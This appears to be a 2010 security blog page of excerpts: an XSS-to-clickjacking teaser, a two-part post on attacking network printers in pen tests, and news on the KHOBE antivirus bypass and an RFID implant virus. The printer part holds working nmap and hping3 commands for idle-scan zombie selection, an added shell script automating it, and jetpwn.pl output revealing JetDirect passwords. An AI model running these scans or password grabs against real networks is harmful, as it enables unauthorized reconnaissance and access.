Tuesday, June 15, 2010

Turning XSS into Clickjacking

"Those of us who do a lot of work in the security world have come to realize that there is a ton of cross site scripting (XSS) out there. 80% of dynamic sites (or more) suffer from it. But how many sites allow you to do HTML file uploads comparatively? It’s a much smaller amount, and typically requires some sort of login before you’re allowed to do it. Oftentimes it’s protected by login too, so it’s a relatively small amount of people who could be impacted by any sort of HTML file upload. But that is precisely what’s needed to mount a clickjacking attack (usually one or two pages). Either the attacker has to rent space in the cloud with a stolen credit card, or find some parasitic hosting somewhere.

That’s when I got to thinking… how can you use any old generic reflected XSS attack to mount a clickjacking attack? A few hours later I had a prototype that worked. Here’s how the attack would work. Let’s say a parameter like “search” was vulnerable to reflected XSS."

Read More

Fun with printers

PART - I



"I don’t see a whole lot on the forums about owning printers during a pen test, so I figured I’d post some stuff here.

First, printers are often overlooked when it comes to securing a network. Why? Because all they’re supposed to do is print. You plug them in, install a driver, and so long as the end user can print, all is well in the world.

Thanks to this misconception, we can use network printers to gather boat loads of information, as well as bounce through them when port scanning, cause disruption, and, well, screw with people.

First, printers are PERFECT boxes to use when doing a bounce (aka, IPID, zombie, idle, etc.) scan. Example:

nmap -sS -p9100 10.0.0.* --open
..snip..
Nmap scan report for 10.0.0.23
Host is up (0.00055s latency).
PORT STATE SERVICE
9100/tcp open jetdirect
..snip..


Ok, so we know that .23 is a printer. Yay.. let’s see how much activity this thing is seeing at the moment..

hping3 10.0.0.23 -r -p 31337
HPING 10.0.0.23 (eth0 10.0.0.23): NO FLAGS are set, 40 headers + 0 data bytes
len=46 ip=10.0.0.23 ttl=64 id=54757 sport=31337 flags=RA seq=0 win=0 rtt=0.6 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=1 win=0 rtt=0.9 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=2 win=0 rtt=0.7 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=3 win=0 rtt=0.7 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=4 win=0 rtt=0.8 ms


Sweet.. each IP ID is incremented by 1; this indicates that there’s no other traffic on this printer at the moment. We can use this to bounce through when doing a scan against the PDC...."

Read More
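The idle-scan check the post walks through, as an added example that is not part of the original forum post: a small POSIX shell script that parses `hping3 -r` output to decide whether a host's IP ID counter is cleanly incremental (and therefore usable as a zombie), then builds the matching `nmap -sI` command. The function names and the two hping3 samples are constructed for this example; in practice you pipe real `hping3 <host> -r -p 31337` output into `classify`.

```shell
#!/bin/sh
# Added example, not from the original forum post: turn the hping3 -r check
# described above into a repeatable test, then build the nmap idle-scan
# command that bounces off the printer. Function names and the two sample
# outputs are constructed for this example; replace the samples with real
# `hping3 <host> -r -p 31337` output.

# Constructed sample: a quiet host. With -r, hping3 prints the first IP ID
# absolutely and every later one relative to the previous reply (id=+N).
SAMPLE_QUIET='len=46 ip=10.0.0.23 ttl=64 id=54757 sport=31337 flags=RA seq=0 win=0 rtt=0.6 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=1 win=0 rtt=0.9 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=2 win=0 rtt=0.7 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=3 win=0 rtt=0.7 ms'

# Constructed sample: a host that is talking to someone else between our
# probes, so its counter jumps by more than one. Useless as a zombie: the
# extra increments would be indistinguishable from the target's SYN/ACKs.
SAMPLE_BUSY='len=46 ip=10.0.0.50 ttl=64 id=1200 sport=31337 flags=RA seq=0 win=0 rtt=0.6 ms
len=46 ip=10.0.0.50 ttl=64 id=+7 sport=31337 flags=RA seq=1 win=0 rtt=0.9 ms
len=46 ip=10.0.0.50 ttl=64 id=+1 sport=31337 flags=RA seq=2 win=0 rtt=0.7 ms'

# ipid_deltas: read hping3 -r output on stdin, print one relative delta
# (the N of id=+N) per line. The first, absolute id line has no + and is skipped.
ipid_deltas() {
    awk '/id=[+]/ { sub(/.*id=[+]/, ""); sub(/ .*/, ""); print }'
}

# is_idle_zombie: succeed only if every observed delta is exactly 1, i.e.
# the host uses a global incremental IP ID counter and nobody else is
# making it send packets right now. Requires at least one relative line.
is_idle_zombie() {
    deltas=$(ipid_deltas)
    [ -n "$deltas" ] || return 1
    for d in $deltas; do
        [ "$d" -eq 1 ] || return 1
    done
    return 0
}

# idle_scan_cmd ZOMBIE TARGET [PORTS]: the nmap invocation that probes
# TARGET through ZOMBIE. -Pn keeps nmap from pinging the target from our
# own address first, which would undo the whole point of the bounce.
idle_scan_cmd() {
    printf 'nmap -Pn -sI %s:31337 -p %s %s\n' "$1" "${3:-1-1024}" "$2"
}

# classify ZOMBIE_IP < hping_output: one-line verdict for a candidate.
classify() {
    if is_idle_zombie; then
        echo "$1: IP ID increments by exactly 1, usable as a zombie"
    else
        echo "$1: IP ID not cleanly incremental, pick another host"
    fi
}

# Demo on the constructed samples
printf '%s\n' "$SAMPLE_QUIET" | classify 10.0.0.23
printf '%s\n' "$SAMPLE_BUSY"  | classify 10.0.0.50
idle_scan_cmd 10.0.0.23 10.0.0.1 135,139,445
```

Two caveats worth keeping in mind: the counter has to stay quiet for the whole scan, not just for the five probes shown, so re-run the check if results look noisy; and nmap's `-sI` performs its own zombie sanity test before scanning, so a host this script rejects will usually be rejected by nmap as well. Printers and similar embedded devices are good candidates precisely because current desktop and server kernels randomize or per-destination the IP ID field, which makes them useless for this.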




PART - II

"Ok, I’ll admit, the last post didn’t have a whole lot to do with printers, but it probably got you interested enough to read part 2.

First, let’s find our network printers..

./jetpwn.pl eth0
Using range 10.0.0.1-255

Password for JetDirect running on 10.0.0.22
Hex password: 49 4e 54 45 52 57 45 42 5a
ASCII password: INTERWEBZ

Password for JetDirect running on 10.0.0.23
Hex password: 50 57 4e 5a
ASCII password: PWNZ
Not only did that find the network printers, it also grabbed and converted the password for us."

Read More

Wednesday, June 9, 2010

Researchers use new exploit to bypass 100 percent of tested AV software

"The Internet just got more dangerous, in terms of malware, if this study is correct. Researchers have discovered a method of bypassing security software, one that they said tested successfully against all 34 of the products tested.

matousec.com said the exploit is usable even if the account does not possess administrative privileges. Among the big names vulnerable according to the report are Symantec (Norton), McAfee, Kaspersky, NOD32, and ZoneAlarm.

All that's required, the researchers said, is for the security software to use System Service Descriptor Table (SSDT) hooks to modify parts of the OS kernel. The researchers have named the exploit KHOBE."

Read More

Man infects himself with computer virus

"University of Reading researcher Mark Gasson has become the first human known to be infected by a computer virus.

The virus, infecting a chip implanted in Gasson's hand, passed into a laboratory computer. From there, the infection could have spread into other computer chips found in building access cards.

All this was intentional, in an experiment to see how simple radio-frequency identification (RFID) chips like those used for tracking animals can host and spread technological diseases.

The research from the British university shows that as implantable bionic devices such as pacemakers get more sophisticated in the years ahead, their security and the safety of the patients whose lives depend on them will become increasingly important, said Gasson."

Read More